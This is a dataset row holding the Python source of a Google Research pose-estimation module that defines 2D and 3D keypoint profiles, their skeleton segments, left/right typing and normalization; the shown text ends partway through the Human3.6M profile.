repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
google-research/google-research | poem/core/keypoint_profiles.py | 1 | 48752 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Keypoint profile class and utility functions."""
import abc
import enum
import six
import tensorflow as tf
from poem.core import keypoint_utils
class LeftRightType(enum.Enum):
  """Keypoint/segment left/right type."""
  # UNKNOWN dominates type inference: combining any type with UNKNOWN yields
  # UNKNOWN (see `infer_keypoint_left_right_type`).
  UNKNOWN = 0
  # CENTRAL acts as the identity when combining types; combining LEFT with
  # RIGHT also collapses to CENTRAL.
  CENTRAL = 1
  LEFT = 2
  RIGHT = 3
def infer_keypoint_left_right_type(left_right_types, indices):
  """Infers keypoint left/right type.

  The inferred left/right type is decided as follows:
  1. If either type is UNKNOWN, returns UNKNOWN.
  2. If both types are the same, returns this type.
  3. If one type is CENTRAL, and the other type is LEFT or RIGHT, returns the
     other type.
  4. If one type is LEFT and the other type is RIGHT, returns CENTRAL.

  Args:
    left_right_types: A list of LeftRightType enum values for all keypoints.
    indices: A list of integers for keypoint indices.

  Returns:
    A LeftRightType enum value for inferred type.

  Raises:
    ValueError: If any index is out of range.
  """
  if not indices:
    return LeftRightType.UNKNOWN

  def type_at(index):
    # Bounds-checked access into the per-keypoint type list.
    if index < 0 or index >= len(left_right_types):
      raise ValueError('Left/right type index is out of range: %d.' % index)
    return left_right_types[index]

  if len(indices) == 1:
    return type_at(indices[0])

  merged = LeftRightType.CENTRAL
  for index in indices:
    keypoint_type = type_at(index)
    if keypoint_type == LeftRightType.UNKNOWN:
      # UNKNOWN dominates: no meaningful type can be inferred.
      return LeftRightType.UNKNOWN
    if merged == LeftRightType.CENTRAL:
      merged = keypoint_type
    elif keypoint_type not in (LeftRightType.CENTRAL, merged):
      # Mixing LEFT and RIGHT collapses the combined type back to CENTRAL.
      merged = LeftRightType.CENTRAL
  return merged
def infer_segment_left_right_type(left_right_types, start_indices, end_indices):
  """Infers segment left/right type.

  The inferred left/right type is decided as follows:
  1. If either type is UNKNOWN, returns UNKNOWN.
  2. If both types are the same, returns this type.
  3. If one type is CENTRAL, and the other type is LEFT or RIGHT, returns the
     other type.
  4. If one type is LEFT and the other type is RIGHT, returns CENTRAL.

  Args:
    left_right_types: A list of LeftRightType enum values for all keypoints.
    start_indices: A list of integers for LHS keypoint indices.
    end_indices: A list of integers for RHS keypoint indices.

  Returns:
    A LeftRightType enum value for inferred type.
  """
  start_type = infer_keypoint_left_right_type(left_right_types, start_indices)
  end_type = infer_keypoint_left_right_type(left_right_types, end_indices)
  if LeftRightType.UNKNOWN in (start_type, end_type):
    return LeftRightType.UNKNOWN
  if start_type == LeftRightType.CENTRAL:
    return end_type
  if end_type == LeftRightType.CENTRAL:
    return start_type
  if start_type == end_type:
    return start_type
  # One end is LEFT and the other is RIGHT.
  return LeftRightType.CENTRAL
class KeypointProfile(six.with_metaclass(abc.ABCMeta, object)):
  """Keypoint profile base class.

  A profile names a fixed set of keypoints (with left/right types), the
  points used for normalization (offset and scale), the skeleton segments,
  and optional mappings from standard body-part names to keypoint indices.
  """

  def __init__(self,
               name,
               keypoint_names,
               offset_keypoint_names,
               scale_keypoint_name_pairs,
               scale_distance_reduction_fn,
               scale_unit,
               segment_name_pairs,
               head_keypoint_name=None,
               neck_keypoint_name=None,
               left_shoulder_keypoint_name=None,
               right_shoulder_keypoint_name=None,
               left_elbow_keypoint_name=None,
               right_elbow_keypoint_name=None,
               left_wrist_keypoint_name=None,
               right_wrist_keypoint_name=None,
               spine_keypoint_name=None,
               pelvis_keypoint_name=None,
               left_hip_keypoint_name=None,
               right_hip_keypoint_name=None,
               left_knee_keypoint_name=None,
               right_knee_keypoint_name=None,
               left_ankle_keypoint_name=None,
               right_ankle_keypoint_name=None):
    """Initializer.

    Args:
      name: A string for the profile name.
      keypoint_names: A list of (keypoint name, LeftRightType) tuples, one per
        keypoint, in index order.
      offset_keypoint_names: A list of keypoint names whose indices are used
        as offset points for normalization.
      scale_keypoint_name_pairs: A list of (start names, end names) tuples;
        distances between these keypoint groups define the normalization
        scale.
      scale_distance_reduction_fn: A callable that reduces multiple scale
        distances into one (e.g. tf.math.reduce_sum).
      scale_unit: A float for the scale unit used by normalize/denormalize.
      segment_name_pairs: A list of (start names, end names) tuples defining
        skeleton segments (used e.g. for the affinity matrix).
      head_keypoint_name: A list of keypoint names for the head, or None.
      neck_keypoint_name: A list of keypoint names for the neck, or None.
      left_shoulder_keypoint_name: Same, for the left shoulder.
      right_shoulder_keypoint_name: Same, for the right shoulder.
      left_elbow_keypoint_name: Same, for the left elbow.
      right_elbow_keypoint_name: Same, for the right elbow.
      left_wrist_keypoint_name: Same, for the left wrist.
      right_wrist_keypoint_name: Same, for the right wrist.
      spine_keypoint_name: Same, for the spine.
      pelvis_keypoint_name: Same, for the pelvis.
      left_hip_keypoint_name: Same, for the left hip.
      right_hip_keypoint_name: Same, for the right hip.
      left_knee_keypoint_name: Same, for the left knee.
      right_knee_keypoint_name: Same, for the right knee.
      left_ankle_keypoint_name: Same, for the left ankle.
      right_ankle_keypoint_name: Same, for the right ankle.
    """
    self._name = name
    self._keypoint_names = [kp_name for kp_name, _ in keypoint_names]
    self._keypoint_left_right_types = [
        kp_type for _, kp_type in keypoint_names
    ]
    self._offset_keypoint_index = [
        self._keypoint_names.index(kp_name)
        for kp_name in offset_keypoint_names
    ]

    def name_pairs_to_index_pairs(name_pairs):
      # Translates ([start names], [end names]) pairs into keypoint index
      # pairs; raises ValueError (from list.index) on unknown names.
      return [([self._keypoint_names.index(n) for n in start_names],
               [self._keypoint_names.index(n) for n in end_names])
              for start_names, end_names in name_pairs]

    self._scale_keypoint_index_pairs = name_pairs_to_index_pairs(
        scale_keypoint_name_pairs)
    self._scale_distance_reduction_fn = scale_distance_reduction_fn
    self._scale_unit = scale_unit
    self._segment_index_pairs = name_pairs_to_index_pairs(segment_name_pairs)

    # Standard body-part name lists (each is a list of keypoint names or
    # None); resolved lazily to indices by the `*_keypoint_index` properties.
    self._head_keypoint_name = head_keypoint_name
    self._neck_keypoint_name = neck_keypoint_name
    self._left_shoulder_keypoint_name = left_shoulder_keypoint_name
    self._right_shoulder_keypoint_name = right_shoulder_keypoint_name
    self._left_elbow_keypoint_name = left_elbow_keypoint_name
    self._right_elbow_keypoint_name = right_elbow_keypoint_name
    self._left_wrist_keypoint_name = left_wrist_keypoint_name
    self._right_wrist_keypoint_name = right_wrist_keypoint_name
    self._spine_keypoint_name = spine_keypoint_name
    self._pelvis_keypoint_name = pelvis_keypoint_name
    self._left_hip_keypoint_name = left_hip_keypoint_name
    self._right_hip_keypoint_name = right_hip_keypoint_name
    self._left_knee_keypoint_name = left_knee_keypoint_name
    self._right_knee_keypoint_name = right_knee_keypoint_name
    self._left_ankle_keypoint_name = left_ankle_keypoint_name
    self._right_ankle_keypoint_name = right_ankle_keypoint_name

  @property
  def name(self):
    """Gets keypoint profile name."""
    return self._name

  @property
  def keypoint_names(self):
    """Gets keypoint names."""
    return self._keypoint_names

  @property
  @abc.abstractmethod
  def keypoint_dim(self):
    """Gets keypoint dimensionality."""
    raise NotImplementedError

  @property
  def keypoint_num(self):
    """Gets number of keypoints."""
    return len(self._keypoint_names)

  def keypoint_left_right_type(self, keypoint_index):
    """Gets keypoint left/right type given index.

    Args:
      keypoint_index: An integer or a list of integers for keypoint indices.

    Returns:
      A LeftRightType enum value.
    """
    if isinstance(keypoint_index, int):
      keypoint_index = [keypoint_index]
    return infer_keypoint_left_right_type(self._keypoint_left_right_types,
                                          keypoint_index)

  def segment_left_right_type(self, start_index, end_index):
    """Gets segment left/right type given index.

    Args:
      start_index: An integer or a list of integers for LHS keypoint indices.
      end_index: An integer or a list of integers for RHS keypoint indices.

    Returns:
      A LeftRightType enum value.
    """
    if isinstance(start_index, int):
      start_index = [start_index]
    if isinstance(end_index, int):
      end_index = [end_index]
    return infer_segment_left_right_type(self._keypoint_left_right_types,
                                         start_index, end_index)

  @property
  def offset_keypoint_index(self):
    """Gets offset keypoint index."""
    return self._offset_keypoint_index

  @property
  def scale_keypoint_index_pairs(self):
    """Gets scale keypoint index pairs."""
    return self._scale_keypoint_index_pairs

  @property
  def scale_unit(self):
    """Gets scale unit."""
    return self._scale_unit

  @property
  def segment_index_pairs(self):
    """Gets segment index pairs."""
    return self._segment_index_pairs

  @property
  def keypoint_affinity_matrix(self):
    """Gets keypoint affinity matrix.

    If a segment has multi-point end, all pairs of relevant points are
    considered as in affinity.

    Returns:
      matrix: A double list of floats for the keypoint affinity matrix.

    Raises:
      ValueError: If affinity matrix has any isolated node.
    """
    matrix = [[0.0
               for _ in range(self.keypoint_num)]
              for _ in range(self.keypoint_num)]
    # Self-affinity.
    for i in range(self.keypoint_num):
      matrix[i][i] = 1.0
    for lhs_index, rhs_index in self._segment_index_pairs:
      # Every keypoint involved in a segment (either end, including
      # multi-point ends) is mutually affine with every other one, so mark
      # all pairs over the combined index set symmetrically.
      segment_indices = list(lhs_index) + list(rhs_index)
      for i in segment_indices:
        for j in segment_indices:
          matrix[i][j] = 1.0
          matrix[j][i] = 1.0
    # Check if the affinity matrix is valid, i.e., each node must have degree
    # greater than 1 (no isolated node).
    for row in matrix:
      if sum(row) <= 1.0:
        raise ValueError(
            'Affinity matrix has a node with degree less than 2: %s.' %
            str(matrix))
    return matrix

  def keypoint_index(self, keypoint_name, raise_error_if_not_found=False):
    """Gets keypoint index given name.

    If `raise_error_if_not_found` is True, raises ValueError if keypoint does
    not exist. Otherwise, returns -1 if keypoint does not exist.

    Args:
      keypoint_name: A string for keypoint name to find index of.
      raise_error_if_not_found: A boolean for whether to raise ValueError if
        keypoint does not exist.

    Returns:
      An integer for keypoint index.

    Raises:
      ValueError: If keypoint does not exist and `raise_error_if_not_found` is
        True.
    """
    if keypoint_name in self._keypoint_names:
      return self._keypoint_names.index(keypoint_name)
    if raise_error_if_not_found:
      raise ValueError('Failed to find keypoint: `%s`.' % str(keypoint_name))
    return -1

  def _part_keypoint_index(self, part_keypoint_names, part_display_name):
    """Resolves a standard part's keypoint names to indices.

    Args:
      part_keypoint_names: A list of keypoint names for the part, or None.
      part_display_name: A string used in the error message, e.g. 'Head'.

    Returns:
      A list of integers for the part's keypoint indices.

    Raises:
      ValueError: If the part is unspecified or any name is unknown.
    """
    if not part_keypoint_names:
      raise ValueError('%s keypoint is not specified.' % part_display_name)
    return [
        self.keypoint_index(name, raise_error_if_not_found=True)
        for name in part_keypoint_names
    ]

  @property
  def head_keypoint_index(self):
    """Gets head keypoint index."""
    return self._part_keypoint_index(self._head_keypoint_name, 'Head')

  @property
  def neck_keypoint_index(self):
    """Gets neck keypoint index."""
    return self._part_keypoint_index(self._neck_keypoint_name, 'Neck')

  @property
  def left_shoulder_keypoint_index(self):
    """Gets left shoulder keypoint index."""
    return self._part_keypoint_index(self._left_shoulder_keypoint_name,
                                     'Left shoulder')

  @property
  def right_shoulder_keypoint_index(self):
    """Gets right shoulder keypoint index."""
    return self._part_keypoint_index(self._right_shoulder_keypoint_name,
                                     'Right shoulder')

  @property
  def left_elbow_keypoint_index(self):
    """Gets left elbow keypoint index."""
    return self._part_keypoint_index(self._left_elbow_keypoint_name,
                                     'Left elbow')

  @property
  def right_elbow_keypoint_index(self):
    """Gets right elbow keypoint index."""
    return self._part_keypoint_index(self._right_elbow_keypoint_name,
                                     'Right elbow')

  @property
  def left_wrist_keypoint_index(self):
    """Gets left wrist keypoint index."""
    return self._part_keypoint_index(self._left_wrist_keypoint_name,
                                     'Left wrist')

  @property
  def right_wrist_keypoint_index(self):
    """Gets right wrist keypoint index."""
    return self._part_keypoint_index(self._right_wrist_keypoint_name,
                                     'Right wrist')

  @property
  def spine_keypoint_index(self):
    """Gets spine keypoint index."""
    return self._part_keypoint_index(self._spine_keypoint_name, 'Spine')

  @property
  def pelvis_keypoint_index(self):
    """Gets pelvis keypoint index."""
    return self._part_keypoint_index(self._pelvis_keypoint_name, 'Pelvis')

  @property
  def left_hip_keypoint_index(self):
    """Gets left hip keypoint index."""
    return self._part_keypoint_index(self._left_hip_keypoint_name, 'Left hip')

  @property
  def right_hip_keypoint_index(self):
    """Gets right hip keypoint index."""
    return self._part_keypoint_index(self._right_hip_keypoint_name,
                                     'Right hip')

  @property
  def left_knee_keypoint_index(self):
    """Gets left knee keypoint index."""
    return self._part_keypoint_index(self._left_knee_keypoint_name,
                                     'Left knee')

  @property
  def right_knee_keypoint_index(self):
    """Gets right knee keypoint index."""
    return self._part_keypoint_index(self._right_knee_keypoint_name,
                                     'Right knee')

  @property
  def left_ankle_keypoint_index(self):
    """Gets left ankle keypoint index."""
    return self._part_keypoint_index(self._left_ankle_keypoint_name,
                                     'Left ankle')

  @property
  def right_ankle_keypoint_index(self):
    """Gets right ankle keypoint index."""
    return self._part_keypoint_index(self._right_ankle_keypoint_name,
                                     'Right ankle')

  @property
  def standard_part_names(self):
    """Gets all standard part names."""
    return [
        'HEAD', 'NECK', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
        'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'SPINE', 'PELVIS',
        'LEFT_HIP', 'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
        'RIGHT_ANKLE'
    ]

  def get_standard_part_index(self, part_name):
    """Gets part index by standardized name.

    Args:
      part_name: A string for standard part name (case-insensitive).

    Returns:
      A list of integers for the part's keypoint indices.

    Raises:
      ValueError: If the part name is not supported.
    """
    # Dispatch table instead of a 16-branch if chain; `.upper()` is applied
    # once so lookup is case-insensitive, matching the original behavior.
    part_index_attrs = {
        'HEAD': 'head_keypoint_index',
        'NECK': 'neck_keypoint_index',
        'LEFT_SHOULDER': 'left_shoulder_keypoint_index',
        'RIGHT_SHOULDER': 'right_shoulder_keypoint_index',
        'LEFT_ELBOW': 'left_elbow_keypoint_index',
        'RIGHT_ELBOW': 'right_elbow_keypoint_index',
        'LEFT_WRIST': 'left_wrist_keypoint_index',
        'RIGHT_WRIST': 'right_wrist_keypoint_index',
        'SPINE': 'spine_keypoint_index',
        'PELVIS': 'pelvis_keypoint_index',
        'LEFT_HIP': 'left_hip_keypoint_index',
        'RIGHT_HIP': 'right_hip_keypoint_index',
        'LEFT_KNEE': 'left_knee_keypoint_index',
        'RIGHT_KNEE': 'right_knee_keypoint_index',
        'LEFT_ANKLE': 'left_ankle_keypoint_index',
        'RIGHT_ANKLE': 'right_ankle_keypoint_index',
    }
    attr_name = part_index_attrs.get(part_name.upper())
    if attr_name is None:
      raise ValueError('Unsupported part name: `%s`.' % part_name)
    return getattr(self, attr_name)

  def normalize(self, keypoints, keypoint_masks=None):
    """Normalizes keypoints.

    Args:
      keypoints: A tensor of keypoints to normalize.
      keypoint_masks: Unused; accepted for interface compatibility.

    Returns:
      The outputs of `keypoint_utils.normalize_points` applied with this
      profile's offset/scale configuration.
    """
    del keypoint_masks
    return keypoint_utils.normalize_points(
        keypoints,
        offset_point_indices=self._offset_keypoint_index,
        scale_distance_point_index_pairs=self._scale_keypoint_index_pairs,
        scale_distance_reduction_fn=self._scale_distance_reduction_fn,
        scale_unit=self._scale_unit)

  def denormalize(self,
                  normalized_keypoints,
                  offset_points,
                  scale_distances,
                  keypoint_masks=None):
    """Denormalizes keypoints.

    Inverts `normalize`: rescales by `scale_distances / scale_unit` and adds
    back the offset points.

    Args:
      normalized_keypoints: A tensor of normalized keypoints.
      offset_points: A tensor of offset points used during normalization.
      scale_distances: A tensor of scale distances used during normalization.
      keypoint_masks: Unused; accepted for interface compatibility.

    Returns:
      A tensor of denormalized keypoints.
    """
    del keypoint_masks
    return (normalized_keypoints / self._scale_unit * scale_distances +
            offset_points)
class KeypointProfile3D(KeypointProfile):
  """3D keypoint profile base class."""

  def __init__(self,
               name,
               keypoint_names,
               offset_keypoint_names,
               scale_keypoint_name_pairs,
               segment_name_pairs,
               scale_distance_reduction_fn=tf.math.reduce_sum,
               scale_unit=1.0,
               head_keypoint_name=None,
               neck_keypoint_name=None,
               left_shoulder_keypoint_name=None,
               right_shoulder_keypoint_name=None,
               left_elbow_keypoint_name=None,
               right_elbow_keypoint_name=None,
               left_wrist_keypoint_name=None,
               right_wrist_keypoint_name=None,
               spine_keypoint_name=None,
               pelvis_keypoint_name=None,
               left_hip_keypoint_name=None,
               right_hip_keypoint_name=None,
               left_knee_keypoint_name=None,
               right_knee_keypoint_name=None,
               left_ankle_keypoint_name=None,
               right_ankle_keypoint_name=None):
    """Initializer."""
    # All bookkeeping is delegated to the base class; this subclass only
    # fixes the dimensionality at 3 and supplies the 3D defaults
    # (sum-reduced scale distances, scale unit 1.0).
    super().__init__(
        name,
        keypoint_names,
        offset_keypoint_names,
        scale_keypoint_name_pairs,
        scale_distance_reduction_fn,
        scale_unit,
        segment_name_pairs,
        head_keypoint_name=head_keypoint_name,
        neck_keypoint_name=neck_keypoint_name,
        left_shoulder_keypoint_name=left_shoulder_keypoint_name,
        right_shoulder_keypoint_name=right_shoulder_keypoint_name,
        left_elbow_keypoint_name=left_elbow_keypoint_name,
        right_elbow_keypoint_name=right_elbow_keypoint_name,
        left_wrist_keypoint_name=left_wrist_keypoint_name,
        right_wrist_keypoint_name=right_wrist_keypoint_name,
        spine_keypoint_name=spine_keypoint_name,
        pelvis_keypoint_name=pelvis_keypoint_name,
        left_hip_keypoint_name=left_hip_keypoint_name,
        right_hip_keypoint_name=right_hip_keypoint_name,
        left_knee_keypoint_name=left_knee_keypoint_name,
        right_knee_keypoint_name=right_knee_keypoint_name,
        left_ankle_keypoint_name=left_ankle_keypoint_name,
        right_ankle_keypoint_name=right_ankle_keypoint_name)

  @property
  def keypoint_dim(self):
    """Gets keypoint dimensionality."""
    return 3
class KeypointProfile2D(KeypointProfile):
  """2D keypoint profile base class."""

  def __init__(self,
               name,
               keypoint_names,
               offset_keypoint_names,
               scale_keypoint_name_pairs,
               segment_name_pairs,
               compatible_keypoint_name_dict=None,
               scale_distance_reduction_fn=tf.math.reduce_max,
               scale_unit=0.5,
               head_keypoint_name=None,
               neck_keypoint_name=None,
               left_shoulder_keypoint_name=None,
               right_shoulder_keypoint_name=None,
               left_elbow_keypoint_name=None,
               right_elbow_keypoint_name=None,
               left_wrist_keypoint_name=None,
               right_wrist_keypoint_name=None,
               spine_keypoint_name=None,
               pelvis_keypoint_name=None,
               left_hip_keypoint_name=None,
               right_hip_keypoint_name=None,
               left_knee_keypoint_name=None,
               right_knee_keypoint_name=None,
               left_ankle_keypoint_name=None,
               right_ankle_keypoint_name=None):
    """Initializer.

    Args:
      name: A string for the profile name.
      keypoint_names: A list of (keypoint name, LeftRightType) tuples.
      offset_keypoint_names: A list of keypoint names for offset points.
      scale_keypoint_name_pairs: A list of (start names, end names) tuples
        defining scale distances.
      segment_name_pairs: A list of (start names, end names) tuples defining
        skeleton segments.
      compatible_keypoint_name_dict: A dictionary mapping a compatible
        profile name to a list of keypoint names; each list must have the
        same length as this profile's keypoint list. Defaults to None.
      scale_distance_reduction_fn: A callable that reduces scale distances.
      scale_unit: A float for the scale unit.
      head_keypoint_name: A list of keypoint names for the head, or None.
        (The remaining `*_keypoint_name` arguments are analogous, one per
        standard body part.)
      neck_keypoint_name: See above.
      left_shoulder_keypoint_name: See above.
      right_shoulder_keypoint_name: See above.
      left_elbow_keypoint_name: See above.
      right_elbow_keypoint_name: See above.
      left_wrist_keypoint_name: See above.
      right_wrist_keypoint_name: See above.
      spine_keypoint_name: See above.
      pelvis_keypoint_name: See above.
      left_hip_keypoint_name: See above.
      right_hip_keypoint_name: See above.
      left_knee_keypoint_name: See above.
      right_knee_keypoint_name: See above.
      left_ankle_keypoint_name: See above.
      right_ankle_keypoint_name: See above.

    Raises:
      ValueError: If any compatible keypoint name list has a different length
        than this profile's keypoint list.
    """
    super().__init__(
        name=name,
        keypoint_names=keypoint_names,
        offset_keypoint_names=offset_keypoint_names,
        scale_keypoint_name_pairs=scale_keypoint_name_pairs,
        scale_distance_reduction_fn=scale_distance_reduction_fn,
        scale_unit=scale_unit,
        segment_name_pairs=segment_name_pairs,
        head_keypoint_name=head_keypoint_name,
        neck_keypoint_name=neck_keypoint_name,
        left_shoulder_keypoint_name=left_shoulder_keypoint_name,
        right_shoulder_keypoint_name=right_shoulder_keypoint_name,
        left_elbow_keypoint_name=left_elbow_keypoint_name,
        right_elbow_keypoint_name=right_elbow_keypoint_name,
        left_wrist_keypoint_name=left_wrist_keypoint_name,
        right_wrist_keypoint_name=right_wrist_keypoint_name,
        spine_keypoint_name=spine_keypoint_name,
        pelvis_keypoint_name=pelvis_keypoint_name,
        left_hip_keypoint_name=left_hip_keypoint_name,
        right_hip_keypoint_name=right_hip_keypoint_name,
        left_knee_keypoint_name=left_knee_keypoint_name,
        right_knee_keypoint_name=right_knee_keypoint_name,
        left_ankle_keypoint_name=left_ankle_keypoint_name,
        right_ankle_keypoint_name=right_ankle_keypoint_name)

    self._compatible_keypoint_name_dict = {}
    if compatible_keypoint_name_dict is not None:
      # Validate before accepting: each compatible profile must provide a
      # one-to-one keypoint correspondence. Iterate values only (keys are
      # not needed for validation).
      for compatible_keypoint_names in compatible_keypoint_name_dict.values():
        if len(compatible_keypoint_names) != len(self._keypoint_names):
          raise ValueError('Compatible keypoint names must be of the same size '
                           'as keypoint names.')
      self._compatible_keypoint_name_dict = compatible_keypoint_name_dict

  @property
  def keypoint_dim(self):
    """Gets keypoint dimensionality."""
    return 2

  @property
  def compatible_keypoint_name_dict(self):
    """Gets compatible keypoint name dictionary."""
    return self._compatible_keypoint_name_dict
class Std16KeypointProfile3D(KeypointProfile3D):
  """Standard 3D 16-keypoint profile."""

  def __init__(self):
    """Initializer."""
    central = LeftRightType.CENTRAL
    left = LeftRightType.LEFT
    right = LeftRightType.RIGHT
    super().__init__(
        name='3DSTD16',
        keypoint_names=[('HEAD', central),
                        ('NECK', central),
                        ('LEFT_SHOULDER', left),
                        ('RIGHT_SHOULDER', right),
                        ('LEFT_ELBOW', left),
                        ('RIGHT_ELBOW', right),
                        ('LEFT_WRIST', left),
                        ('RIGHT_WRIST', right),
                        ('SPINE', central),
                        ('PELVIS', central),
                        ('LEFT_HIP', left),
                        ('RIGHT_HIP', right),
                        ('LEFT_KNEE', left),
                        ('RIGHT_KNEE', right),
                        ('LEFT_ANKLE', left),
                        ('RIGHT_ANKLE', right)],
        offset_keypoint_names=['PELVIS'],
        scale_keypoint_name_pairs=[(['NECK'], ['SPINE']),
                                   (['SPINE'], ['PELVIS'])],
        # Segments connect anatomically adjacent keypoints.
        segment_name_pairs=[(['HEAD'], ['NECK']),
                            (['NECK'], ['LEFT_SHOULDER']),
                            (['NECK'], ['RIGHT_SHOULDER']),
                            (['NECK'], ['SPINE']),
                            (['LEFT_SHOULDER'], ['LEFT_ELBOW']),
                            (['RIGHT_SHOULDER'], ['RIGHT_ELBOW']),
                            (['LEFT_ELBOW'], ['LEFT_WRIST']),
                            (['RIGHT_ELBOW'], ['RIGHT_WRIST']),
                            (['SPINE'], ['PELVIS']),
                            (['PELVIS'], ['LEFT_HIP']),
                            (['PELVIS'], ['RIGHT_HIP']),
                            (['LEFT_HIP'], ['LEFT_KNEE']),
                            (['RIGHT_HIP'], ['RIGHT_KNEE']),
                            (['LEFT_KNEE'], ['LEFT_ANKLE']),
                            (['RIGHT_KNEE'], ['RIGHT_ANKLE'])],
        # Each standard part maps one-to-one onto a profile keypoint.
        head_keypoint_name=['HEAD'],
        neck_keypoint_name=['NECK'],
        left_shoulder_keypoint_name=['LEFT_SHOULDER'],
        right_shoulder_keypoint_name=['RIGHT_SHOULDER'],
        left_elbow_keypoint_name=['LEFT_ELBOW'],
        right_elbow_keypoint_name=['RIGHT_ELBOW'],
        left_wrist_keypoint_name=['LEFT_WRIST'],
        right_wrist_keypoint_name=['RIGHT_WRIST'],
        spine_keypoint_name=['SPINE'],
        pelvis_keypoint_name=['PELVIS'],
        left_hip_keypoint_name=['LEFT_HIP'],
        right_hip_keypoint_name=['RIGHT_HIP'],
        left_knee_keypoint_name=['LEFT_KNEE'],
        right_knee_keypoint_name=['RIGHT_KNEE'],
        left_ankle_keypoint_name=['LEFT_ANKLE'],
        right_ankle_keypoint_name=['RIGHT_ANKLE'])
class Std13KeypointProfile3D(KeypointProfile3D):
  """Standard 3D 13-keypoint profile."""

  def __init__(self):
    """Initializer."""
    central = LeftRightType.CENTRAL
    left = LeftRightType.LEFT
    right = LeftRightType.RIGHT
    # Multi-keypoint groups stand in for parts this profile lacks explicit
    # keypoints for (neck, spine, pelvis).
    shoulders = ['LEFT_SHOULDER', 'RIGHT_SHOULDER']
    hips = ['LEFT_HIP', 'RIGHT_HIP']
    torso = ['LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_HIP', 'RIGHT_HIP']
    super().__init__(
        name='3DSTD13',
        keypoint_names=[('HEAD', central),
                        ('LEFT_SHOULDER', left),
                        ('RIGHT_SHOULDER', right),
                        ('LEFT_ELBOW', left),
                        ('RIGHT_ELBOW', right),
                        ('LEFT_WRIST', left),
                        ('RIGHT_WRIST', right),
                        ('LEFT_HIP', left),
                        ('RIGHT_HIP', right),
                        ('LEFT_KNEE', left),
                        ('RIGHT_KNEE', right),
                        ('LEFT_ANKLE', left),
                        ('RIGHT_ANKLE', right)],
        offset_keypoint_names=['LEFT_HIP', 'RIGHT_HIP'],
        scale_keypoint_name_pairs=[(shoulders, hips)],
        segment_name_pairs=[
            (['HEAD'], shoulders),
            (shoulders, ['LEFT_SHOULDER']),
            (shoulders, ['RIGHT_SHOULDER']),
            (shoulders, torso),
            (['LEFT_SHOULDER'], ['LEFT_ELBOW']),
            (['RIGHT_SHOULDER'], ['RIGHT_ELBOW']),
            (['LEFT_ELBOW'], ['LEFT_WRIST']),
            (['RIGHT_ELBOW'], ['RIGHT_WRIST']),
            (torso, hips),
            (hips, ['LEFT_HIP']),
            (hips, ['RIGHT_HIP']),
            (['LEFT_HIP'], ['LEFT_KNEE']),
            (['RIGHT_HIP'], ['RIGHT_KNEE']),
            (['LEFT_KNEE'], ['LEFT_ANKLE']),
            (['RIGHT_KNEE'], ['RIGHT_ANKLE'])
        ],
        head_keypoint_name=['HEAD'],
        neck_keypoint_name=shoulders,
        left_shoulder_keypoint_name=['LEFT_SHOULDER'],
        right_shoulder_keypoint_name=['RIGHT_SHOULDER'],
        left_elbow_keypoint_name=['LEFT_ELBOW'],
        right_elbow_keypoint_name=['RIGHT_ELBOW'],
        left_wrist_keypoint_name=['LEFT_WRIST'],
        right_wrist_keypoint_name=['RIGHT_WRIST'],
        spine_keypoint_name=torso,
        pelvis_keypoint_name=hips,
        left_hip_keypoint_name=['LEFT_HIP'],
        right_hip_keypoint_name=['RIGHT_HIP'],
        left_knee_keypoint_name=['LEFT_KNEE'],
        right_knee_keypoint_name=['RIGHT_KNEE'],
        left_ankle_keypoint_name=['LEFT_ANKLE'],
        right_ankle_keypoint_name=['RIGHT_ANKLE'])
class LegacyH36m17KeypointProfile3D(KeypointProfile3D):
  """Legacy Human3.6M 3D 17-keypoint profile."""

  def __init__(self):
    """Initializer."""
    central = LeftRightType.CENTRAL
    left = LeftRightType.LEFT
    right = LeftRightType.RIGHT
    super().__init__(
        name='LEGACY_3DH36M17',
        keypoint_names=[('Hip', central),
                        ('Head', central),
                        ('Neck/Nose', central),
                        ('Thorax', central),
                        ('LShoulder', left),
                        ('RShoulder', right),
                        ('LElbow', left),
                        ('RElbow', right),
                        ('LWrist', left),
                        ('RWrist', right),
                        ('Spine', central),
                        ('LHip', left),
                        ('RHip', right),
                        ('LKnee', left),
                        ('RKnee', right),
                        ('LFoot', left),
                        ('RFoot', right)],
        offset_keypoint_names=['Hip'],
        scale_keypoint_name_pairs=[(['Hip'], ['Spine']),
                                   (['Spine'], ['Thorax'])],
        segment_name_pairs=[(['Hip'], ['Spine']), (['Hip'], ['LHip']),
                            (['Hip'], ['RHip']), (['Spine'], ['Thorax']),
                            (['LHip'], ['LKnee']), (['RHip'], ['RKnee']),
                            (['LKnee'], ['LFoot']), (['RKnee'], ['RFoot']),
                            (['Thorax'], ['Neck/Nose']),
                            (['Thorax'], ['LShoulder']),
                            (['Thorax'], ['RShoulder']),
                            (['Neck/Nose'], ['Head']),
                            (['LShoulder'], ['LElbow']),
                            (['RShoulder'], ['RElbow']),
                            (['LElbow'], ['LWrist']), (['RElbow'], ['RWrist'])],
        head_keypoint_name=['Head'],
        # The H36M 'Thorax' keypoint is used as the standard neck part.
        neck_keypoint_name=['Thorax'],
        left_shoulder_keypoint_name=['LShoulder'],
        right_shoulder_keypoint_name=['RShoulder'],
        left_elbow_keypoint_name=['LElbow'],
        right_elbow_keypoint_name=['RElbow'],
        left_wrist_keypoint_name=['LWrist'],
        right_wrist_keypoint_name=['RWrist'],
        spine_keypoint_name=['Spine'],
